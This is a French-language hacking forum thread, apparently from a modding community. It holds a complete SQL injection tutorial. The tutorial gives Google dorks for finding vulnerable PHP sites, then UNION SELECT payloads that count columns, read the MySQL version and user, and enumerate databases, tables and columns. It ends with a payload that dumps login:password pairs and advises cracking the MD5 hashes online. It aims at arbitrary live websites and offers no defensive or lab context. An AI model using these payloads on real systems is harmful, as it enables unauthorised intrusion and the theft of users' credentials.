Conditions d'utilisation et règles

Conditions et règles a lire !

Politique de confidentialité

Quelles informations nous détenons sur vous ?

Contacter le Staff

Un problème ? Une question ?

  • Bienvenue sur Societyfrenchmodding !


    Societyfrenchmodding, est une communauté francophone fondée sur le principe de partage et entraides. Vous avez des questions ? n'hésitez pas a les poser, nous somme là pour vous répondre. L'inscription est gratuite, profitez en et rejoignez-nous !

  • Mod Manager BY Societyfrenchmodding!

    Télécharger

    notre Mod Manager MR ROBOT BY JOE ,

    Compatible Tout SPRX

    et encore d'autre Mod !

  • Mod Manager BY Societyfrenchmodding!

    Télécharger

    notre Mod Manager Spécial RAP Society

    et encore d'autre Mod !

Tutoriel Injection SQL - complet[Kali linux]

Membres qui ont lu cette discussion (Total: 2) Voir détails

PaNdA_SOCIETY

Membre
Ancien Staff
Messages
29
J'aime
70
Points
18
Top réponses
0
  1. Trouver les sites vulnérables
  2. Trouver le nombre de colonnes
  3. Connaître la version de MySQL
  4. Récupérer les bases de données
  5. Récupérer les tables
  6. Récupérer les colonnes
  7. Récupérer les noms d'utilisateurs et mots de passes

1. Trouver le nombre de colonnes

Pour trouver des sites vulnérables, vous aurez besoin de dorks.
En voici quelques un :
Code:
inurl:index.php?id=
inurl:news.php?id=
inurl:category.php?id=
inurl:games.php?id=
inurl:forum.php?tid=
inurl:newsletter.php?id=
inurl:content.php?id=
Disons que nous avons ce site :

Code:

Veuillez vous Identifier ou vous Inscrire pour afficher le contenu masqué.


Si nous ajoutons un ' après les chiffres, et que nous avons une erreur, alors le site est vulnérable.


2. Trouver le nombre de colonnes

Pour trouver le bon nombre de colonnes, nous allons utiliser la requête "order by", voici un exemple en reprenant le site ci-dessus.

Code:

Veuillez vous Identifier ou vous Inscrire pour afficher le contenu masqué.

order by 1-- (pas d'erreur)

Veuillez vous Identifier ou vous Inscrire pour afficher le contenu masqué.

order by 2-- (pas d'erreur)

Veuillez vous Identifier ou vous Inscrire pour afficher le contenu masqué.

order by 3-- (pas d'erreur)

Veuillez vous Identifier ou vous Inscrire pour afficher le contenu masqué.

order by 4-- (pas d'erreur)

Veuillez vous Identifier ou vous Inscrire pour afficher le contenu masqué.

order by 5-- (pas d'erreur)

Veuillez vous Identifier ou vous Inscrire pour afficher le contenu masqué.

order by 6-- (pas d'erreur)

Veuillez vous Identifier ou vous Inscrire pour afficher le contenu masqué.

order by 7-- (pas d'erreur)

Veuillez vous Identifier ou vous Inscrire pour afficher le contenu masqué.

order by 8-- (pas d'erreur)

Veuillez vous Identifier ou vous Inscrire pour afficher le contenu masqué.

order by 9-- (erreur)
Ce qui veut dire que notre site contient 8 colonnes.

Continuons avec la commande "union select".

Code:

Veuillez vous Identifier ou vous Inscrire pour afficher le contenu masqué.

union select 1,2,3,4,5,6,7,8--
Notez bien le - avant le nombre 828, très important !

Le site va maintenant nous afficher un ou plusieurs chiffres sur la page en plus ou moins gros.
Ce sont tout simplement les colonnes qui sont vulnérables et donc qui nous confirme que le site est bien vulnérable aux SQLi.


3. Connaître la version de MySQL (version et utilisateur)

Maintenant, nous voulons connaître la version de MySQL. Si elle est >5, donc l'injection peut continuer. Si elle est <5, vous devrez deviner les tables et les colonnes, mais nous verrons cela dans un prochain tuto.

Code:

Veuillez vous Identifier ou vous Inscrire pour afficher le contenu masqué.

union select 1,2,@@version,4,5,6,7,8--
Pour avoir l'utilisateur actuel, entrez cette commande :
Code:

Veuillez vous Identifier ou vous Inscrire pour afficher le contenu masqué.

union select 1,2,user(),4,5,6,7,8--

4. Récupérer les bases de données

Maintenant nous allons chercher les bases de données et la base de données actuelle.
Si nous voulons voir toutes les bases de données :

Code:

Veuillez vous Identifier ou vous Inscrire pour afficher le contenu masqué.

union select 1,2,group_concat(schema_name),4,5,6,7,8 from information_schema.schemata--
Si nous voulons seulement la base de données actuelle :
Code:

Veuillez vous Identifier ou vous Inscrire pour afficher le contenu masqué.

union select 1,2,database(),4,5,6,7,8

5. Récupérer les tables

Maintenant nous voulons connaître les tables présentes dans la base de données. Pour cela nous allons utiliser la requête "union select".

Code:

Veuillez vous Identifier ou vous Inscrire pour afficher le contenu masqué.

union select 1,2,group_concat(table_name),4,5,6,7,8 from information_schema.tables where table_schema=database()--

On imagine donc que les mots de passes sont stockés dans la table bpusers, retenez-le et continuons.


6. Récupérer les colonnes

Maintenant nous voulons connaître les colonnes.

Pour cela, nous allons utiliser ce code :

Code:

Veuillez vous Identifier ou vous Inscrire pour afficher le contenu masqué.

union select 1,2,group_concat(column_name),4,5,6,7,8 from information_schema.columns where table_schema=database()--
7. Récupérer les noms d'utilisateurs/mots de passes

Pour finir, nous voulons donc récupérer les noms d'utilisateurs ainsi que leur mots de passes.

Pour cela nous allons utiliser le code :

Code:

Veuillez vous Identifier ou vous Inscrire pour afficher le contenu masqué.

union select 1,2,group_concat(login,0x3a,password,0x3a),4,5,6,7,8 from bpusers--


Vous aurez donc ce que vous désirez.
Vous pourrez remarquer que quelques fois (souvent), les mots de passes sont bizarres. Ils sont tout simplement cryptés en MD5 (la plupart du temps).
Pour essayer de trouver le mot de passe, rendez-vous sur un site du style :

Veuillez vous Identifier ou vous Inscrire pour afficher le contenu masqué.



Note : Le 0x3a sera lu comme un : entre login et password, ne l'oubliez donc pas.


Vous venez d'effectuer une injection SQL avec succès, bravo

crédit : cнєrσkєє
 

AnonyNooB

Membre super Actif
Ancien Staff
Messages
261
J'aime
303
Points
68
Top réponses
0
bien poto le tutoje me demande si j vais pas me mettre sous linux moi
 
Haut Bas